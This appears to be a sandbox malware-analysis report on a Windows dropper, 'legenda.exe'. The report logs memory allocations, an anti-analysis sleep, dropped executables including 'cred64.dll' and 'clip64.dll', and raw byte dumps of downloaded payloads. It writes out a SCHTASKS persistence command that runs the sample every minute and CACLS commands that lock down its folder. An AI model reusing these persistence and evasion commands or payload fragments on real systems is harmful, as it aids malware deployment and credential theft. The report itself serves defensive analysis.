NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0061e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fc1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0061f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fda000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fdb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fdc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

legenda.exe tried to sleep 143 seconds, actually delayed analysis time by 143 seconds

Creates executable files on the filesystem (7 events)

file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\1000015001\download.exe
file	C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe
file	C:\Users\test22\AppData\Local\Temp\1000005001\Installer.exe
file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\f22b669919\ Install_2.5.7-I602.exe
file	C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe

Creates a suspicious process (4 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "legenda.exe" /P "test22:N"&&CACLS "legenda.exe" /P "test22:R" /E&&echo Y\|CACLS "..\f22b669919" /P "test22:N"&&CACLS "..\f22b669919" /P "test22:R" /E&&Exit

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\1000005001\Installer.exe
file	C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe
file	C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe
file	C:\Users\test22\AppData\Local\Temp\1000015001\download.exe

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe
file	C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe
file	C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll

A process created a hidden window (9 events)

Time & API	Arguments	Status	Return
ShellExecuteExW March 13, 2023, 9:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe	1	1
ShellExecuteExW March 13, 2023, 9:40 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW March 13, 2023, 9:40 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "legenda.exe" /P "test22:N"&&CACLS "legenda.exe" /P "test22:R" /E&&echo Y\|CACLS "..\f22b669919" /P "test22:N"&&CACLS "..\f22b669919" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW March 13, 2023, 9:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\Installer.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000005001\Installer.exe		0
ShellExecuteExW March 13, 2023, 9:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe	1	1
ShellExecuteExW March 13, 2023, 9:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe	1	1
ShellExecuteExW March 13, 2023, 9:40 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000015001\download.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000015001\download.exe	1	1
ShellExecuteExW March 13, 2023, 9:41 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW March 13, 2023, 9:40 a.m.	show_type: 0 filepath_r: Install_2.5.7-I602.exe parameters: filepath: Install_2.5.7-I602.exe		0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 13, 2023, 9:40 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process legenda.exe (6 events)

Time & API	Arguments	Status	Return
InternetReadFile March 13, 2023, 9:40 a.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win64 $7PEd ²éûcð"ÞÜ@ ;ð«E` @Ðs 0§0´u0À( ±PÀ.textÀ `.dataø @À.bss0b@À.idata¦°,@À.didataÀ2@À.edatasÐ4@@.tlsàÀ.rdatamð6@@.reloc8@B.pdataÀ L@@.rsrc§0\@@.enigma1À`7ê@à.enigma2à Ðà J:ààn@FalseTrueSystem@@Integerÿÿÿ`@Byteÿ@Wordÿÿ @CardinalÿÿÿÿÀ@Pointerà@ NativeUIntÿÿÿÿÿÿÿÿ@ShortStringÿ @string8@TClassè @X@HRESULTÿÿÿx@TGUID@D1x@D2x@D3D4pR@&op_Equality@p@Leftp@Right R@&op_Inequality@p@Leftp@Right ÐS@Emptyp@ àR@Createp@Data@ BigEndian S@Createp@X@Data@AStartIndex@ BigEndianT@IsEmpty@P@PInterfaceEntryp@x@TInterfaceEntry(p@IID¸@VTable8@IOffset@_FillerØ@ ImplGetter(@PInterfaceTableH@P@TInterfaceTable8@ EntryCount@_FillerEntries@ð @@R@ð^@_@Ðb@Àb@c@c@ c@ðb@P[@[@`\@ [@°[@À[@%Z@Dñÿ@Bñÿ¼@Bñÿñ@Cñÿ?@Bñÿz@Bñÿ¯@Cñÿó@Cñÿ<@Cñÿs@Cñÿ¨@Cñÿà@Cñÿ,@Cñÿw@CñÿÂ@Cñÿ@Cñÿi@Bñÿ³@Bñÿý@BñÿW@Cñÿ¥@Cñÿâ@Cñÿ%@Cñÿi@Jòÿ¬@Jóÿã@Jôÿ&@Jõÿ@JöÿÒ@J÷ÿ@JøÿX@Jùÿ§@KúÿÞ@Jûÿ @MüÿI @Jýÿ~ @Jþÿ³ @JÿÿTObject2Ð[@Create è @Self0\@Freeè @Self5°\@ DisposeOfè @SelfN`]@InitInstanceè @ Self¸@Instance; ^@CleanupInstanceè @Self5ðY@ ClassType0@è @SelfDZ@ ClassName@ Self@@I[@ClassNameIs@ Self@Name70[@ClassParent0@Self5Z@ ClassInfo¸@Self8@[@InstanceSize8@SelfL b@InheritsFrom@ Self0@AClassKc@ MethodAddress¸@ Self@NameK d@ MethodAddress¸@ Self@NameZPd@ MethodName@(Self¸@Address@@M@Z@QualifiedClassName@ Self@@JÐd@FieldAddress¸@ è @Self@NameJe@FieldAddress¸@ è @Self@NameZ request_handle: 0x00cc000c	1	1
InternetReadFile March 13, 2023, 9:40 a.m.	buffer: 8-Ò-Ð·ÐÈÂÈÂÜJxL.k\|)hð¨6¸X²Dæ¤äüD«,8vexàp0¼¼(yPhÛ `nn~'lÞnÖHjF?Ðp±T@Û`ðÄ`M4Ð/XVAÐ·ñ¿hV?÷$ÿ®«9IAayá$·ü¿úI\|:x\nJv6dºÉÂ'xùän hrA2éh$Ù`Ãöw£³Â§NX²²¦@¤8áNúØMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd ð." ÀTdD2p0 ð hÐ ôe ¤ Ö h.text ÀÂ `.dataTdàfÆ@À.rdata\|µP¶,@@.pdataôe fâ@@.bssD2 À.CRTÀ H @À.idataÂÐ J @À.edatahð b @@.reloc¤ "d @BQh>$jÅÍB«IdEÙMt ø±¹?ì$ô¬I%'V~P¾òÆÐNJ=ËE'ì{ÅäºòÂIF$4QèYÔOÂ¿ÉÇdÎ_((zx¾\|öïh)¦Nà$nì~ðôø®ü¾üÎüÞüîüþü9¡:.;><N,^LÕÂèËìØ´ÜEÛ"ÙèÉùÑ³ÝÄdLÑôSîoè-¸¸XüÜæî®þà<UäeèuÙÙÈÙjL¨È@@@ZøÐ<'ºåÆÒlò¬Êìä6ÏéO¥µÏÅÏÕÌåÕ 4¢Ñ±yì²×ô.hk)mÅXÍ/æê£@òh%¢òJkìX%ÎREbîÒÉðê4l*²ævjKz¢¢®`ªrt,Y<Ò=l-tÑÒb#ËÀåàöð¦ôÈ~)Ñ9ÙIáY,R??½?Í?Ý?í%ýA-ý5,D[Ó&!ÈR[O@¨\@(FÁPtY&X"ÏH psQðúä$K0nÄHÔ,;ìr{Àüßüç\|7KLlÙ,Ä¤²`Ô9 æ²£»ÁjdÚIÂsqhùzdèá¦ request_handle: 0x00cc000c	1	1
InternetReadFile March 13, 2023, 9:40 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $z4ä>ãZ·>ãZ·>ãZ·QÄ·0ãZ·Qð·bãZ·7É·7ãZ·>ã[·KãZ·Qñ·%ãZ·QÀ·?ãZ·QÇ·?ãZ·Rich>ãZ·PEL(jªbà Ð({>à@¬bÕdxå,@¸.textÏÐ `.dataÈ* àVÔ@À.rsrcxåæ@@&Û ÛØØ:ØJØXØjØxØØ¦Ø¼ØÒØäØøØÙ2Ù@ÙNÙbÙÙÙô×°Ù¼ÙÐÙîÙÚÚ0Ú<ÚPÚZÚjÚvÚÚÚ´ÚÈ×æ×¦Ù¸×HÛXÛfÛrÛ~ÛÛÛ´ÛÆÛâÛòÛÜÜÜ*Ü6ÜFÜ\ÜtÜÜªÜ¾ÜÒÜæÜüÜÝ,ÝFÝXÝÝÝ¦Ý²ÝÀÝÎÝØÝðÝÞ"Þ2ÞHÞbÞrÞzÞÞÞÞ¨ÞºÞÐÞÜÞìÞþÞß"ß4ß@ßRß`ßpßßàÚÒÚìÚ??@hE@E{@È@Vi@Â@F@Bedowe cukon novPogixucugalNigizuzuja jaguwit sibedacuducato pox juyocokohokukVoyapeyifer hivaco takari yusu sopNigiwiyu seceRusefuf bozedijFer wadamopenobumi bufexixopi zoz winagemecadisHanoc yocecaj dijKatijaw xocuwiyocJefi xabusefuvo wamefipafagos gafifasudagetif nayaYidefafisomo hotecuf gibonekupufu rotipowetalix moriwiTenu joyabakBipovey duzJacefedojatico toguxuforifake ginokin %s %d %f00 %fCorExitProcessmscoree.dllruntime error TLOSS error SING error DOMAIN error R6033 - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6032 - not enough space for locale information R6031 - Attempt to initialize the CRT more than once. This indicates a bug in your application. R6030 - CRT not initialized R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data R6010 - abort() has been called R6009 - not enough request_handle: 0x00cc000c	1	1
InternetReadFile March 13, 2023, 9:40 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELsÞòà0p Â+ @ à @p+O tÀ T+ H.text`o p `.rsrct r @@.relocÀ x @B¤+HT! .s(.(( 04(trpo ( ,rQp o &( 0h c %Ð( s s s s o o (+(+ Þ,o Ü,o Ü,o Ü (.H !1R A\ ( BSJBv4.0.30319lT#~À`#Strings h#US#GUIDh#BlobW ú3"Ê:Ø§Øn¦øPPþPPZPsPP¹`¹áPÈÙ'.$.ªÿªEØ.FPPPÅ.Ø@.. :ª Ý:ín½ø.&AAùAAaU3 P 5\ #¡h ó¨ ° i¥L! ) 1 9 A I Q Y a i q y ¡ ±Ø±!&O,z4 Ñ.K S é Y añba>g=l>5.ª.³.Ò.#Û.+Û.3Û.;Û.CÛ.KÛ.SÛ.[Û.cá.k.s£{`c !@È+´.)9~;~IEnumerable`1WindowsFormsApp16B93183687631EA74C7081ED266BF8C25880C677A13D6A31BD2AE2E9EFFD3545__StaticArrayInitTypeSize=615316<Module><PrivateImplementationDetails>System.IOmscorlibSystem.Collections.GenericLoadCompressionModeEnumerableIDisposableRuntimeFieldHandleValueTypeGetTypeSystem.CoreDisposeReverseCompilerGeneratedAttributeGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteblueloader.exeSystem.Runtime.VersioningBlackDreamBufferedStreamGZipStreamMemoryStreamProgramSystemMainSystem.IO.CompressionSystem.ReflectionCopyToGzipSystem.LinqInvokeMemberblueloaderBinderHunter.ctorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesDebuggingModesBindingFlagsRuntimeHelpersCatObjectInitializeArrayToArrayAssemblyop_InequalityODOdUyAvTTkAMSVXV2fb.pMe10YvR6S8XNAhRClaQIHv1ZH53tZ~ÈÛ0oODÄã½~E YE EEE ]a IIMmq y} y ·z\V4à TWrapNonExceptionThrows)$795f0e44-0093-41cb-af35-a8a4be7215ec1.0.0.0G.NETFramework,Version=v4.0TFrameworkDisplayName.NET Framework 4+²+ ¤+_CorExeMainmscoree.dllÿ% @ì»gX]×0I½# ½÷>ô^UPÁ¢¢¢( 6DE© ½÷Þ{ïED¢`EáÛ3 !>Ï}¿ïóã\ç:Hföìµ×^½ìÌÿýùÿßÖvðÁaúU2åO Ï`Ü0®ós'Ì(Æs ã9 FçÁ¯)ÂÐctþ×u0G1càÙ9ÌvteG'íÆæ¿` 8: üXOaÁïøEîÁpwss ¬rÇÀÇXQ0×Sà¹hW{ÀÌÙOÙÿ<æ$xzåé¸ÃØ¢+\Àx+J<Á¯ø¿ÅàïØÏsìn`þû5Nåÿ#~lÈ\| ½®V(;ÿAöÿ)ýU9 rW¥ðM¹(E(> 0T°$¾ÿÖ'Xu¬8r·¦#DP¦ãGisºV¥üBö8xîònEÙÏÕÐ9e FSõtçÑý a04Itþ?1!ºÜàÜüýEW~ÑO<HË34íèxÀcp:ÏmàºÈyÀêîöy âZpÏÚµÜXþüãAeýÃóõàÂþÏÿïÏÿ~LD1R+èÝ©SÇÎ¹=sÆõõ©SçÜÌÈp¬ ªÿ@3¢Yd1ÇÎ*rv>ãåuÊÙñ request_handle: 0x00cc000c	1	1
InternetReadFile March 13, 2023, 9:40 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $çø6£ne£ne£neªe©neñd¡neñd²neñd©neñd ne·d¤ne£nenegd¢negie¢negd¢neRich£nePEd×=dð"üð@@?é`)ÈPuÞ@h*¸!0,#p#8 ¨.text\ `.rdataè @@.dataH0"@À.pdatah@$@@.rsrcuÞPà&@@.reloc,0@BHì8E3ÉHÇD$ L93ÉH`ÿrE3ÉÇD$(LHÇD$ H°3Éÿ03ÀHÄ8ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌffH; uHÁÁf÷ÁÿÿuÃHÁÉéªÌÌ@SHì ¹è¾èãÈèèèËØè¹èDÀtsè? H t èßè¢ÈèÀuRè¢èáÀtH ~èaèèèjÈèèÀtèIèPèÀuHÄ [Ã¹è³ÌÌÌHì(èg3ÀHÄ(ÃHì(è?èÈHÄ(éMÌÌÌH\$Ht$WHì0¹è/À6@2ö@t$ èÞØ $ù#ÉuJÇï#H8H è® Àt ¸ÿéÙH÷H àè Ç±#ë@¶@t$ ËèèËHØH8tHÈènÀtE3ÀAP3ÉHÿ\|è§HØH8tHÈèBÀtHèT è Høè5 Hè' LÇHÓèýÿÿØèÅÀtU@öuè 3Ò±è²ÃëØè£Àt;\|$ uèó ÃH\$@Ht$HHÄ0_Ã¹è#¹èËè¡ Ëè Hì(è×HÄ(érþÿÿÌÌ@SHì HÙ3ÉÿC HËÿB ÿ, HÈº ÀHÄ [Hÿ% HL$Hì8¹ÿôÀt¹Í)H è©HD$8HiHD$8HÀHùHRHÃHD$@HÇÇ ÀÇÇ¡¸HkÀH HÇ¸HkÀH )HL ¸HkÀH HL H 0èÿþÿÿHÄ8ÃÌÌ@SVWHì@HÙÿH³ø3ÿE3ÀHT$`HÎÿ9HÀt9Hd$8HL$hHT$`LÈHL$0LÆHL$pHL$(3ÉH\$ ÿúÿÇÿ\|±HÄ@_^[ÃÌÌÌHì(èÀt!eH%0HHëH;Èt3ÀðH± !uî2ÀHÄ(Ã°ë÷ÌÌÌ@SHì ¶÷ É»DÃç è¦è½Àu2Àëè°Àu 3Éè¥ëêÃHÄ [ÃÌÌÌ@SHì =¬ ÙugùwjèÀt(Ûu$H èÀuH èÀt.2Àë3foéHÈÿóe Hn ón Hw ÆA °HÄ [Ã¹èfÌÌHìLÁ¸MZf9YêÿÿuxHc êÿÿHIêÿÿHÊ9PEu_¸f9AuTL+Â·AHQHÐ·AHLÊH$I;ÑtJL;Ár BÁL;ÀrHÂ(ëß3ÒHÒu2Àëz$}2Àë °ë2Àë2ÀHÄÃ@SHì Ùèï3ÒÀtÛuHnHÄ [Ã@SHì =cÙtÒuè6Ëè/°HÄ [ÃÌÌÌ@SHì H=>ÿHÙuèBëHÓH (è+3ÒÀHDÓHÂHÄ [ÃÌÌHì(è»ÿÿÿH÷ØÀ÷ØÿÈHÄ(ÃÌH\$ UHìHì H$H»2¢ß-+H;ÃutHeHMÿ HEHEÿ ÀH1Eÿ ÀHM H1EÿÔE HMHÁà H3E H3EH3ÁH¹ÿÿÿÿÿÿH#ÁH¹3¢ß-+H;ÃHDÁH¡H\$HH÷ÐHHÄ ]Ã3ÀÃÌ¸ÃÌÌ¸@ÃÌÌH iHÿ%zÌÌ°ÃÌÂÌHaÃHaÃHì(èçÿÿÿH$èæÿÿÿHHÄ(ÃÌ3À98ÀÃHYÃHIÃ%)ÃH\$UH¬$@ûÿÿHìÀÙ¹ÿ&ÀtËÍ)¹èÄÿÿÿ3ÒHMðA¸ÐèHMðÿñHèHØHËE3ÀÿHÀt<Hd$8HàHØLÈHL$0LÃHèHL$(HMðHL$ 3ÉÿÆHÈHL$PHè3ÒHÈA¸HÀHè~HÈHD$`ÇD$P@ÇD$TÿøHD$PHD$@HEðÃHD$H3ÉÿAHL$@ÿ>ÀuÛuHè¾þÿÿH$ÐHÄÀ]ÃÌé3þÿÿÌÌÌHì(3Éÿ°HÀt:¹MZf9u0HcH<HÈ9PEu!¸f9Au¹v ¹øt°ë2ÀHÄ(ÃÌÌH Hÿ%ªÌÌH\$WHì HHù;csmàu{uS àúlæøvú@t H\$03ÀHÄ _ÃèPHH_èJHèÒÌÌH\$WHì Hû H=ô ëHHÀtÿHÃH;ßréH\$0HÄ _ÃH\$WHì HÏ H=È ëHHÀtÿHHÃH;ßréH\$0HÄ _ÃH\$Ht$WHì3À3É¢DÁE3ÛDËAðntelAñGenuDÒð3ÉACEÈ¢AòineI$EÊ\$ùL$T$uPH ;ÿ%ð?ÿ=Àt(=`t!=pt°ùüÿø w$H¹H£ÁsDAÈDëDü¸DHû;ð\|&3É¢$DÛ\$L$T$ºã s EÁDÉÇ§D ¤ºçD »ºçsyºçss3ÉÐHÁâ HÐHT$ HD$ "Ã:ÃuWZÈÇIGAöÃ t8È Ç0.¸ÐD#ØD;ØuHD$ request_handle: 0x00cc000c	1	1
InternetReadFile March 13, 2023, 9:41 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL6[dà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô 